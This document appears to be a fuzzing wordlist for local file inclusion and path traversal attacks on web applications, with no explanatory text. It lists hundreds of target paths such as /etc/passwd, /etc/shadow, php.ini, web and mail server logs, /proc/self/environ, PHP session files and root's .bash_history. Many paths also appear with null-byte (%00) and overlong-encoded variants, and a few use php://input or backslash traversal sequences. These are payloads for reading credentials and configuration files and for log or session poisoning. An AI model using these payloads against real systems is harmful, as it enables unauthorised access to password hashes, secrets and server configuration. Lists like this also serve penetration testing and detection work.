etc%c0%afpasswd
|
||||
etc%c0%afpasswd%00
|
||||
/etc/chrootUsers
|
||||
/etc/chrootUsers
|
||||
/etc/chrootUsers%00
|
||||
/etc/crontab
|
||||
/etc/fstab
|
||||
/etc/ftpchroot
|
||||
/etc/ftpchroot
|
||||
/etc/ftpchroot%00
|
||||
/etc/ftphosts
|
||||
/etc/ftphosts
|
||||
/etc/ftphosts%00
|
||||
/etc/group
|
||||
/etc/group
|
||||
/etc/group%00
|
||||
/etc/hosts
|
||||
/etc/http/conf/httpd.conf
|
||||
/etc/http/conf/httpd.conf
|
||||
/etc/http/conf/httpd.conf%00
|
||||
/etc/httpd.conf
|
||||
/etc/httpd.conf
|
||||
/etc/httpd.conf%00
|
||||
/etc/httpd/conf.d/php.conf
|
||||
/etc/httpd/conf/httpd.conf
|
||||
/etc/httpd/conf/httpd.conf
|
||||
/etc/httpd/conf/httpd.conf%00
|
||||
/etc/httpd/httpd.conf
|
||||
/etc/httpd/httpd.conf
|
||||
/etc/httpd/httpd.conf%00
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/acces_log%00
|
||||
/etc/httpd/logs/acces.log%00
|
||||
/etc/httpd/logs/access_log
|
||||
/etc/httpd/logs/access.log
|
||||
/etc/httpd/logs/access.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
/etc/httpd/logs/error.log
|
||||
/etc/httpd/logs/error_log%00
|
||||
/etc/httpd/logs/error.log%00
|
||||
/etc/httpd/php.ini
|
||||
/etc/httpd/php.ini
|
||||
/etc/httpd/php.ini%00
|
||||
/etc/http/httpd.conf
|
||||
/etc/http/httpd.conf
|
||||
/etc/http/httpd.conf%00
|
||||
/etc/inittab
|
||||
/etc/issue
|
||||
/etc/issue
|
||||
/etc/logrotate.d/ftp
|
||||
/etc/logrotate.d/ftp
|
||||
/etc/logrotate.d/ftp%00
|
||||
/etc/logrotate.d/proftpd
|
||||
/etc/logrotate.d/proftpd
|
||||
/etc/logrotate.d/proftpd%00
|
||||
/etc/logrotate.d/vsftpd.log
|
||||
/etc/logrotate.d/vsftpd.log
|
||||
/etc/logrotate.d/vsftpd.log%00
|
||||
/etc/master.passwd
|
||||
/etc/motd
|
||||
/etc/motd
|
||||
/etc/my.cnf
|
||||
/etc/my.cnf
|
||||
/etc/my.cnf%00
|
||||
/etc/mysql/my.cnf
|
||||
/etc/mysql/my.cnf
|
||||
/etc/mysql/my.cnf%00
|
||||
/etc/nginx.conf
|
||||
/etc/nginx/nginx.conf
|
||||
/etc/nginx/sites-available/default
|
||||
/etc/nginx/sites-enabled/default
|
||||
/etc/pam.d/proftpd
|
||||
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
|
||||
/etc/passwd
|
||||
/etc/passwd
|
||||
/etc/passwd%00
|
||||
etc/passwd%00
|
||||
/etc/php4.4/fcgi/php.ini
|
||||
/etc/php4.4/fcgi/php.ini
|
||||
/etc/php4.4/fcgi/php.ini%00
|
||||
/etc/php4/apache2/php.ini
|
||||
/etc/php4/apache2/php.ini
|
||||
/etc/php4/apache2/php.ini%00
|
||||
/etc/php4/apache/php.ini
|
||||
/etc/php4/apache/php.ini
|
||||
/etc/php4/apache/php.ini%00
|
||||
/etc/php4/cgi/php.ini
|
||||
/etc/php4/cgi/php.ini
|
||||
/etc/php4/cgi/php.ini%00
|
||||
/etc/php5/apache2/php.ini
|
||||
/etc/php5/apache2/php.ini
|
||||
/etc/php5/apache2/php.ini%00
|
||||
/etc/php5/apache/php.ini
|
||||
/etc/php5/apache/php.ini
|
||||
/etc/php5/apache/php.ini%00
|
||||
/etc/php5/cgi/php.ini
|
||||
/etc/php5/cgi/php.ini
|
||||
/etc/php5/cgi/php.ini%00
|
||||
/etc/php/apache2/php.ini
|
||||
/etc/php/apache2/php.ini
|
||||
/etc/php/apache2/php.ini%00
|
||||
/etc/php/apache/php.ini
|
||||
/etc/php/apache/php.ini
|
||||
/etc/php/apache/php.ini%00
|
||||
/etc/php/cgi/php.ini
|
||||
/etc/php/cgi/php.ini
|
||||
/etc/php/cgi/php.ini%00
|
||||
/etc/php.ini
|
||||
/etc/php.ini
|
||||
/etc/php.ini%00
|
||||
/etc/phpmyadmin/config.inc.php
|
||||
/etc/php/php4/php.ini
|
||||
/etc/php/php4/php.ini
|
||||
/etc/php/php4/php.ini%00
|
||||
/etc/php/php.ini
|
||||
/etc/php/php.ini
|
||||
/etc/php/php.ini%00
|
||||
/etc/proftp.conf
|
||||
/etc/proftp.conf
|
||||
/etc/proftp.conf%00
|
||||
/etc/proftpd/modules.conf
|
||||
/etc/proftpd/modules.conf
|
||||
/etc/proftpd/modules.conf%00
|
||||
/etc/protpd/proftpd.conf
|
||||
/etc/protpd/proftpd.conf
|
||||
/etc/protpd/proftpd.conf%00
|
||||
/etc/pure-ftpd.conf
|
||||
/etc/pure-ftpd.conf
|
||||
/etc/pure-ftpd.conf%00
|
||||
/etc/pureftpd.passwd
|
||||
/etc/pureftpd.passwd
|
||||
/etc/pureftpd.passwd%00
|
||||
/etc/pureftpd.pdb
|
||||
/etc/pureftpd.pdb
|
||||
/etc/pureftpd.pdb%00
|
||||
/etc/pure-ftpd/pure-ftpd.conf
|
||||
/etc/pure-ftpd/pure-ftpd.conf
|
||||
/etc/pure-ftpd/pure-ftpd.conf%00
|
||||
/etc/pure-ftpd/pure-ftpd.pdb
|
||||
/etc/pure-ftpd/pure-ftpd.pdb
|
||||
/etc/pure-ftpd/pureftpd.pdb
|
||||
/etc/pure-ftpd/pureftpd.pdb
|
||||
/etc/pure-ftpd/pure-ftpd.pdb%00
|
||||
/etc/pure-ftpd/pureftpd.pdb%00
|
||||
/etc/redhat-release
|
||||
/etc/release
|
||||
/etc/security/environ
|
||||
/etc/security/environ
|
||||
/etc/security/environ%00
|
||||
/etc/security/group
|
||||
/etc/security/group
|
||||
/etc/security/group%00
|
||||
/etc/security/limits
|
||||
/etc/security/limits
|
||||
/etc/security/limits%00
|
||||
/etc/security/passwd
|
||||
/etc/security/passwd
|
||||
/etc/security/passwd%00
|
||||
/etc/security/user
|
||||
/etc/security/user
|
||||
/etc/security/user%00
|
||||
/etc/shadow
|
||||
/etc/shadow~
|
||||
/etc/shadow
|
||||
/etc/shadow%00
|
||||
/etc/ssh/sshd_config
|
||||
/etc/sysconfig/network-scripts/ifcfg-eth0
|
||||
/etc/vhcs2/proftpd/proftpd.conf
|
||||
/etc/vhcs2/proftpd/proftpd.conf
|
||||
/etc/vhcs2/proftpd/proftpd.conf%00
|
||||
/etc/vsftpd.chroot_list
|
||||
/etc/vsftpd.chroot_list
|
||||
/etc/vsftpd.chroot_list%00
|
||||
/etc/vsftpd.conf
|
||||
/etc/vsftpd.conf
|
||||
/etc/vsftpd.conf%00
|
||||
/etc/vsftpd/vsftpd.conf
|
||||
/etc/vsftpd/vsftpd.conf
|
||||
/etc/vsftpd/vsftpd.conf%00
|
||||
/etc/wu-ftpd/ftpaccess
|
||||
/etc/wu-ftpd/ftpaccess
|
||||
/etc/wu-ftpd/ftpaccess%00
|
||||
/etc/wu-ftpd/ftphosts
|
||||
/etc/wu-ftpd/ftphosts
|
||||
/etc/wu-ftpd/ftphosts%00
|
||||
/etc/wu-ftpd/ftpusers
|
||||
/etc/wu-ftpd/ftpusers
|
||||
/etc/wu-ftpd/ftpusers%00
|
||||
/home2\bin\stable\apache\php.ini
|
||||
/home2\bin\stable\apache\php.ini
|
||||
/home2\bin\stable\apache\php.ini%00
|
||||
/home\bin\stable\apache\php.ini
|
||||
/home\bin\stable\apache\php.ini
|
||||
/home\bin\stable\apache\php.ini%00
|
||||
\log\access_log
|
||||
\log\access.log
|
||||
\log\error_log
|
||||
\log\error.log
|
||||
\log\httpd\access_log
|
||||
\log\httpd\error_log
|
||||
/logs/access_log
|
||||
/logs/access_log
|
||||
/logs/access.log
|
||||
/logs/access.log
|
||||
\logs\access_log
|
||||
\logs\access.log
|
||||
/logs/access.log%00
|
||||
/logs/error_log
|
||||
/logs/error_log
|
||||
/logs/error.log
|
||||
/logs/error.log
|
||||
\logs\error_log
|
||||
\logs\error.log
|
||||
/logs/error.log%00
|
||||
\logs\httpd\access_log
|
||||
\logs\httpd\error_log
|
||||
/logs/pure-ftpd.log
|
||||
/logs/pure-ftpd.log
|
||||
/logs/pure-ftpd.log%00
|
||||
\mysql\bin\my.ini
|
||||
/NetServer\bin\stable\apache\php.ini
|
||||
/NetServer\bin\stable\apache\php.ini
|
||||
/NetServer\bin\stable\apache\php.ini%00
|
||||
/opt/apache2/conf/httpd.conf
|
||||
/opt/apache2/conf/httpd.conf
|
||||
/opt/apache2/conf/httpd.conf%00
|
||||
/opt/apache/conf/httpd.conf
|
||||
/opt/apache/conf/httpd.conf
|
||||
/opt/apache/conf/httpd.conf%00
|
||||
/opt/lampp/logs/access_log
|
||||
/opt/lampp/logs/access_log
|
||||
/opt/lampp/logs/access.log
|
||||
/opt/lampp/logs/access.log
|
||||
/opt/lampp/logs/access_log%00
|
||||
/opt/lampp/logs/access.log%00
|
||||
/opt/lampp/logs/error_log
|
||||
/opt/lampp/logs/error_log
|
||||
/opt/lampp/logs/error.log
|
||||
/opt/lampp/logs/error.log
|
||||
/opt/lampp/logs/error_log%00
|
||||
/opt/lampp/logs/error.log%00
|
||||
/opt/xampp/etc/php.ini
|
||||
/opt/xampp/etc/php.ini
|
||||
/opt/xampp/etc/php.ini%00
|
||||
/opt/xampp/logs/access_log
|
||||
/opt/xampp/logs/access_log
|
||||
/opt/xampp/logs/access.log
|
||||
/opt/xampp/logs/access.log
|
||||
\opt\xampp\logs\access_log
|
||||
\opt\xampp\logs\access.log
|
||||
/opt/xampp/logs/access_log%00
|
||||
/opt/xampp/logs/access.log%00
|
||||
/opt/xampp/logs/error_log
|
||||
/opt/xampp/logs/error_log
|
||||
/opt/xampp/logs/error.log
|
||||
/opt/xampp/logs/error.log
|
||||
\opt\xampp\logs\error_log
|
||||
\opt\xampp\logs\error.log
|
||||
/opt/xampp/logs/error_log%00
|
||||
/opt/xampp/logs/error.log%00
|
||||
/php4\php.ini
|
||||
/php4\php.ini
|
||||
/php4\php.ini%00
|
||||
/php5\php.ini
|
||||
/php5\php.ini
|
||||
/php5\php.ini%00
|
||||
php://input
|
||||
/php\php.ini
|
||||
/php\php.ini
|
||||
/PHP\php.ini
|
||||
/PHP\php.ini
|
||||
/php\php.ini%00
|
||||
/PHP\php.ini%00
|
||||
/private/etc/httpd/httpd.conf
|
||||
/private/etc/httpd/httpd.conf
|
||||
/private/etc/httpd/httpd.conf%00
|
||||
/private/etc/httpd/httpd.conf.default
|
||||
/private/etc/httpd/httpd.conf.default
|
||||
/private/etc/httpd/httpd.conf.default%00
|
||||
/proc/cmdline
|
||||
/proc/self/cmdline
|
||||
/proc/self/environ
|
||||
/proc/self/fd/0
|
||||
/proc/self/fd/1
|
||||
/proc/self/fd/10
|
||||
/proc/self/fd/11
|
||||
/proc/self/fd/12
|
||||
/proc/self/fd/13
|
||||
/proc/self/fd/14
|
||||
/proc/self/fd/15
|
||||
/proc/self/fd/16
|
||||
/proc/self/fd/17
|
||||
/proc/self/fd/18
|
||||
/proc/self/fd/19
|
||||
/proc/self/fd/2
|
||||
/proc/self/fd/20
|
||||
/proc/self/fd/21
|
||||
/proc/self/fd/22
|
||||
/proc/self/fd/23
|
||||
/proc/self/fd/24
|
||||
/proc/self/fd/25
|
||||
/proc/self/fd/255
|
||||
/proc/self/fd/26
|
||||
/proc/self/fd/27
|
||||
/proc/self/fd/28
|
||||
/proc/self/fd/29
|
||||
/proc/self/fd/3
|
||||
/proc/self/fd/30
|
||||
/proc/self/fd/31
|
||||
/proc/self/fd/32
|
||||
/proc/self/fd/33
|
||||
/proc/self/fd/34
|
||||
/proc/self/fd/35/etc/passwd%00
|
||||
/proc/self/fd/4
|
||||
/proc/self/fd/5
|
||||
/proc/self/fd/6
|
||||
/proc/self/fd/7
|
||||
/proc/self/fd/8
|
||||
/proc/self/fd/9
|
||||
/proc/self/stat
|
||||
/proc/self/status
|
||||
/proc/version
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
\Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
\Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf%00
|
||||
/Program Files\Apache Group\Apache\logs\access.log
|
||||
/Program Files\Apache Group\Apache\logs\access.log
|
||||
\Program Files\Apache Group\Apache\logs\access.log
|
||||
/Program Files\Apache Group\Apache\logs\access.log%00
|
||||
/Program Files\Apache Group\Apache\logs\error.log
|
||||
/Program Files\Apache Group\Apache\logs\error.log
|
||||
\Program Files\Apache Group\Apache\logs\error.log
|
||||
/Program Files\Apache Group\Apache\logs\error.log%00
|
||||
/Program Files\xampp\apache\conf\httpd.conf
|
||||
/Program Files\xampp\apache\conf\httpd.conf
|
||||
/Program Files\xampp\apache\conf\httpd.conf%00
|
||||
\Program Files\xampp\apache\conf\httpd.confetc/passwd
|
||||
/root/.bash_history
|
||||
/tmp/sess_<sessid>
|
||||
/usr/apache2/conf/httpd.conf
|
||||
/usr/apache2/conf/httpd.conf
|
||||
/usr/apache2/conf/httpd.conf%00
|
||||
/usr/apache/conf/httpd.conf
|
||||
/usr/apache/conf/httpd.conf
|
||||
/usr/apache/conf/httpd.conf%00
|
||||
/usr/etc/pure-ftpd.conf
|
||||
/usr/etc/pure-ftpd.conf
|
||||
/usr/etc/pure-ftpd.conf%00
|
||||
/usr/lib/php.ini
|
||||
/usr/lib/php.ini
|
||||
/usr/lib/php.ini%00
|
||||
/usr/lib/php/php.ini
|
||||
/usr/lib/php/php.ini
|
||||
/usr/lib/php/php.ini%00
|
||||
/usr/lib/security/mkuser.default
|
||||
/usr/lib/security/mkuser.default
|
||||
/usr/lib/security/mkuser.default%00
|
||||
/usr/local/apache2/conf/httpd.conf
|
||||
/usr/local/apache2/conf/httpd.conf
|
||||
/usr/local/apache2/conf/httpd.conf%00
|
||||
/usr/local/apache2/httpd.conf
|
||||
/usr/local/apache2/httpd.conf
|
||||
/usr/local/apache2/httpd.conf%00
|
||||
/usr/local/apache2/logs/access_log
|
||||
/usr/local/apache2/logs/access_log
|
||||
/usr/local/apache2/logs/access.log
|
||||
/usr/local/apache2/logs/access.log
|
||||
/usr/local/apache2/logs/access_log%00
|
||||
/usr/local/apache2/logs/access.log%00
|
||||
/usr/local/apache2/logs/error_log
|
||||
/usr/local/apache2/logs/error_log
|
||||
/usr/local/apache2/logs/error.log
|
||||
/usr/local/apache2/logs/error.log
|
||||
/usr/local/apache2/logs/error_log%00
|
||||
/usr/local/apache2/logs/error.log%00
|
||||
/usr/local/apache/conf/httpd.conf
|
||||
/usr/local/apache/conf/httpd.conf
|
||||
/usr/local/apache/conf/httpd.conf%00
|
||||
/usr/local/apache/conf/php.ini
|
||||
/usr/local/apache/conf/php.ini
|
||||
/usr/local/apache/conf/php.ini%00
|
||||
/usr/local/apache/httpd.conf
|
||||
/usr/local/apache/httpd.conf
|
||||
/usr/local/apache/httpd.conf%00
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/access_ log%00
|
||||
/usr/local/apache/logs/access_log%00
|
||||
/usr/local/apache/logs/access. log%00
|
||||
/usr/local/apache/logs/access.log%00
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
/usr/local/apache/logs/error.log
|
||||
/usr/local/apache/logs/error.log
|
||||
/usr/local/apache/logs/error_log%00
|
||||
/usr/local/apache/logs/error.log%00
|
||||
/usr/local/apps/apache2/conf/httpd.conf
|
||||
/usr/local/apps/apache2/conf/httpd.conf
|
||||
/usr/local/apps/apache2/conf/httpd.conf%00
|
||||
/usr/local/apps/apache/conf/httpd.conf
|
||||
/usr/local/apps/apache/conf/httpd.conf
|
||||
/usr/local/apps/apache/conf/httpd.conf%00
|
||||
/usr/local/cpanel/logs
|
||||
/usr/local/cpanel/logs
|
||||
/usr/local/cpanel/logs%00
|
||||
/usr/local/cpanel/logs/access_log
|
||||
/usr/local/cpanel/logs/access_log
|
||||
/usr/local/cpanel/logs/access_log%00
|
||||
/usr/local/cpanel/logs/error_log
|
||||
/usr/local/cpanel/logs/error_log
|
||||
/usr/local/cpanel/logs/error_log%00
|
||||
/usr/local/cpanel/logs/license_log
|
||||
/usr/local/cpanel/logs/license_log
|
||||
/usr/local/cpanel/logs/license_log%00
|
||||
/usr/local/cpanel/logs/login_log
|
||||
/usr/local/cpanel/logs/login_log
|
||||
/usr/local/cpanel/logs/login_log%00
|
||||
/usr/local/cpanel/logs/stats_log
|
||||
/usr/local/cpanel/logs/stats_log
|
||||
/usr/local/cpanel/logs/stats_log%00
|
||||
/usr/local/etc/apache2/conf/httpd.conf
|
||||
/usr/local/etc/apache2/conf/httpd.conf
|
||||
/usr/local/etc/apache2/conf/httpd.conf%00
|
||||
/usr/local/etc/apache/conf/httpd.conf
|
||||
/usr/local/etc/apache/conf/httpd.conf
|
||||
/usr/local/etc/apache/conf/httpd.conf%00
|
||||
/usr/local/etc/apache/vhosts.conf
|
||||
/usr/local/etc/apache/vhosts.conf
|
||||
/usr/local/etc/apache/vhosts.conf%00
|
||||
/usr/local/etc/httpd/conf/httpd.conf
|
||||
/usr/local/etc/httpd/conf/httpd.conf
|
||||
/usr/local/etc/httpd/conf/httpd.conf%00
|
||||
/usr/local/etc/php.ini
|
||||
/usr/local/etc/php.ini
|
||||
/usr/local/etc/php.ini%00
|
||||
/usr/local/etc/pure-ftpd.conf
|
||||
/usr/local/etc/pure-ftpd.conf
|
||||
/usr/local/etc/pure-ftpd.conf%00
|
||||
/usr/local/etc/pureftpd.pdb
|
||||
/usr/local/etc/pureftpd.pdb
|
||||
/usr/local/etc/pureftpd.pdb%00
|
||||
/usr/local/httpd/conf/httpd.conf
|
||||
/usr/local/httpd/conf/httpd.conf
|
||||
/usr/local/httpd/conf/httpd.conf%00
|
||||
/usr/local/lib/php.ini
|
||||
/usr/local/lib/php.ini
|
||||
/usr/local/lib/php.ini%00
|
||||
/usr/local/php4/httpd.conf
|
||||
/usr/local/php4/httpd.conf
|
||||
/usr/local/php4/httpd.conf%00
|
||||
/usr/local/php4/httpd.conf.php
|
||||
/usr/local/php4/httpd.conf.php
|
||||
/usr/local/php4/httpd.conf.php%00
|
||||
/usr/local/php4/lib/php.ini
|
||||
/usr/local/php4/lib/php.ini
|
||||
/usr/local/php4/lib/php.ini%00
|
||||
/usr/local/php5/httpd.conf
|
||||
/usr/local/php5/httpd.conf
|
||||
/usr/local/php5/httpd.conf%00
|
||||
/usr/local/php5/httpd.conf.php
|
||||
/usr/local/php5/httpd.conf.php
|
||||
/usr/local/php5/httpd.conf.php%00
|
||||
/usr/local/php5/lib/php.ini
|
||||
/usr/local/php5/lib/php.ini
|
||||
/usr/local/php5/lib/php.ini%00
|
||||
/usr/local/php/httpd.conf
|
||||
/usr/local/php/httpd.conf
|
||||
/usr/local/php/httpd.conf%00
|
||||
/usr/local/php/httpd.conf.php
|
||||
/usr/local/php/httpd.conf.php
|
||||
/usr/local/php/httpd.conf.php%00
|
||||
/usr/local/php/lib/php.ini
|
||||
/usr/local/php/lib/php.ini
|
||||
/usr/local/php/lib/php.ini%00
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf%00
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb%00
|
||||
/usr/local/pureftpd/sbin/pure-config.pl
|
||||
/usr/local/pureftpd/sbin/pure-config.pl
|
||||
/usr/local/pureftpd/sbin/pure-config.pl%00
|
||||
/usr/local/Zend/etc/php.ini
|
||||
/usr/local/Zend/etc/php.ini
|
||||
/usr/local/Zend/etc/php.ini%00
|
||||
/usr/pkgsrc/net/pureftpd/
|
||||
/usr/pkgsrc/net/pureftpd/
|
||||
/usr/pkgsrc/net/pureftpd/%00
|
||||
/usr/ports/contrib/pure-ftpd/
|
||||
/usr/ports/contrib/pure-ftpd/
|
||||
/usr/ports/contrib/pure-ftpd/%00
|
||||
/usr/ports/ftp/pure-ftpd/
|
||||
/usr/ports/ftp/pure-ftpd/
|
||||
/usr/ports/ftp/pure-ftpd/%00
|
||||
/usr/ports/net/pure-ftpd/
|
||||
/usr/ports/net/pure-ftpd/
|
||||
/usr/ports/net/pure-ftpd/%00
|
||||
/usr/sbin/pure-config.pl
|
||||
/usr/sbin/pure-config.pl
|
||||
/usr/sbin/pure-config.pl%00
|
||||
/var/adm/lastlog
|
||||
/var/adm/log/xferlog
|
||||
/var/adm/log/xferlog
|
||||
/var/adm/log/xferlog%00
|
||||
/var/adm/messages
|
||||
/var/adm/messages.0
|
||||
/var/adm/messages.1
|
||||
/var/adm/messages.2
|
||||
/var/adm/messages.3
|
||||
/var/adm/utmpx
|
||||
/var/adm/wtmpx
|
||||
/var/cpanel/cpanel.config
|
||||
/var/cpanel/cpanel.config
|
||||
/var/cpanel/cpanel.config%00
|
||||
/var/db/shadow/hash
|
||||
/var/lib/mysql/my.cnf
|
||||
/var/lib/mysql/my.cnf
|
||||
/var/lib/mysql/my.cnf%00
|
||||
/var/lib/php5/session/sess_<sessid>
|
||||
/var/lib/php/session/sess_<sessid>
|
||||
/var/local/www/conf/php.ini
|
||||
/var/local/www/conf/php.ini
|
||||
/var/local/www/conf/php.ini%00
|
||||
/var/log/access_log
|
||||
/var/log/access_log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
/var/log/access.log
|
||||
/var/log/access.log
|
||||
/var/log/access_log%00
|
||||
/var/log/access.log%00
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/apache2/access_log%00
|
||||
/var/log/apache2/access.log%00
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/apache2/error_log%00
|
||||
/var/log/apache2/error.log%00
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache/access_log%00
|
||||
/var/log/apache/access.log%00
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache/error_log%00
|
||||
/var/log/apache/error.log%00
|
||||
/var/log/authlog
|
||||
/var/log/auth.log
|
||||
/var/log/auth.log.0
|
||||
/var/log/auth.log.0.gz
|
||||
/var/log/auth.log.1
|
||||
/var/log/auth.log.1.gz
|
||||
/var/log/auth.log.2
|
||||
/var/log/auth.log.2.gz
|
||||
/var/log/auth.log.3
|
||||
/var/log/auth.log.3.gz
|
||||
/var/log/error_log
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
||||
/var/log/error.log
|
||||
/var/log/error_log%00
|
||||
/var/log/error.log%00
|
||||
/var/log/exim_mainlog
|
||||
/var/log/exim_mainlog
|
||||
/var/log/exim/mainlog
|
||||
/var/log/exim/mainlog
|
||||
/var/log/exim_mainlog%00
|
||||
/var/log/exim/mainlog%00
|
||||
/var/log/exim_paniclog
|
||||
/var/log/exim_paniclog
|
||||
/var/log/exim/paniclog
|
||||
/var/log/exim/paniclog
|
||||
/var/log/exim_paniclog%00
|
||||
/var/log/exim/paniclog%00
|
||||
/var/log/exim_rejectlog
|
||||
/var/log/exim/rejectlog
|
||||
/var/log/exim/rejectlog
|
||||
/var/log/exim/rejectlog%00
|
||||
/var/log/exim_rejectlog%00/etc/issue
|
||||
/var/log/exim_rejectlog/etc/passwd
|
||||
/var/log/ftplog
|
||||
/var/log/ftplog
|
||||
/var/log/ftplog%00
|
||||
/var/log/ftp-proxy
|
||||
/var/log/ftp-proxy
|
||||
/var/log/ftp-proxy%00
|
||||
/var/log/ftp-proxy/ftp-proxy.log
|
||||
/var/log/ftp-proxy/ftp-proxy.log
|
||||
/var/log/ftp-proxy/ftp-proxy.log%00
|
||||
/var/log/httpd/access_log
|
||||
/var/log/httpd/access_log
|
||||
/var/log/httpd/access.log
|
||||
/var/log/httpd/access_log%00
|
||||
/var/log/httpd/access.log%00
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/error.log
|
||||
/var/log/httpd/error_log%00
|
||||
/var/log/httpd/error.log%00
|
||||
/var/log/kernel.log
|
||||
/var/log/lastlog
|
||||
/var/log/maillog
|
||||
/var/log/mail.log
|
||||
/var/log/maillog
|
||||
/var/log/maillog%00
|
||||
/var/log/messages
|
||||
/var/log/messages.0
|
||||
/var/log/messages.0.gz
|
||||
/var/log/messages.1
|
||||
/var/log/messages.1.gz
|
||||
/var/log/messages.2
|
||||
/var/log/messages.2.gz
|
||||
/var/log/messages.3
|
||||
/var/log/messages.3.gz
|
||||
/var/log/messages.log
|
||||
/var/log/mysqlderror.log
|
||||
/var/log/mysqlderror.log
|
||||
/var/log/mysqlderror.log%00
|
||||
/var/log/mysql.log
|
||||
/var/log/mysql.log
|
||||
/var/log/mysql.log%00
|
||||
/var/log/mysql/mysql-bin.log
|
||||
/var/log/mysql/mysql-bin.log
|
||||
/var/log/mysql/mysql-bin.log%00
|
||||
/var/log/mysql/mysql.log
|
||||
/var/log/mysql/mysql.log
|
||||
/var/log/mysql/mysql.log%00
|
||||
/var/log/mysql/mysql-slow.log
|
||||
/var/log/mysql/mysql-slow.log
|
||||
/var/log/mysql/mysql-slow.log%00
|
||||
/var/log/nginx/access_log
|
||||
/var/log/nginx/access_log
|
||||
/var/log/nginx/access_log
|
||||
/var/log/nginx/access.log
|
||||
/var/log/nginx/access.log
|
||||
/var/log/nginx/access_log%00
|
||||
/var/log/nginx/access.log%00
|
||||
/var/log/nginx/error_log
|
||||
/var/log/nginx/error_log
|
||||
/var/log/nginx/error.log
|
||||
/var/log/nginx/error.log
|
||||
/var/log/nginx/error.log
|
||||
/var/log/nginx/error_log%00
|
||||
/var/log/nginx/error.log%00
|
||||
/var/log/proftpd
|
||||
/var/log/proftpd
|
||||
/var/log/proftpd%00
|
||||
/var/log/pureftpd.log
|
||||
/var/log/pureftpd.log
|
||||
/var/log/pureftpd.log%00
|
||||
/var/log/pure-ftpd/pure-ftpd.log
|
||||
/var/log/pure-ftpd/pure-ftpd.log
|
||||
/var/log/pure-ftpd/pure-ftpd.log%00
|
||||
/var/log/secure.log
|
||||
/var/log/syslog
|
||||
/var/log/syslog.0
|
||||
/var/log/syslog.0.gz
|
||||
/var/log/syslog.1
|
||||
/var/log/syslog.1.gz
|
||||
/var/log/syslog.2
|
||||
/var/log/syslog.2.gz
|
||||
/var/log/syslog.3
|
||||
/var/log/syslog.3.gz
|
||||
/var/log/syslog.log
|
||||
/var/log/vsftpd.log
|
||||
/var/log/vsftpd.log
|
||||
/var/log/vsftpd.log%00
|
||||
/var/log/wtmp
|
||||
/var/log/xferlog
|
||||
/var/log/xferlog
|
||||
/var/log/xferlog%00
|
||||
/var/mail/apache
|
||||
/var/mail/nobody
|
||||
/var/mail/www
|
||||
/var/mail/www-data
|
||||
/var/mysql.log
|
||||
/var/mysql.log
|
||||
/var/mysql.log%00
|
||||
/var/root/.bash_history
|
||||
/var/root/.sh_history
|
||||
/var/run/utmp
|
||||
/var/www/.bash_history
|
||||
/var/www/conf/httpd.conf
|
||||
/var/www/conf/httpd.conf
|
||||
/var/www/conf/httpd.conf%00
|
||||
/var/www/config.php
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
/var/www/logs/access.log
|
||||
/var/www/logs/access_log%00
|
||||
/var/www/logs/access.log%00
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
/var/www/logs/error.log
|
||||
/var/www/logs/error.log
|
||||
/var/www/logs/error_log%00
|
||||
/var/www/logs/error.log%00
|
||||
/var/www/mgr/logs/access_log
|
||||
/var/www/mgr/logs/access.log
|
||||
/var/www/mgr/logs/error_log
|
||||
/var/www/mgr/logs/error.log
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||
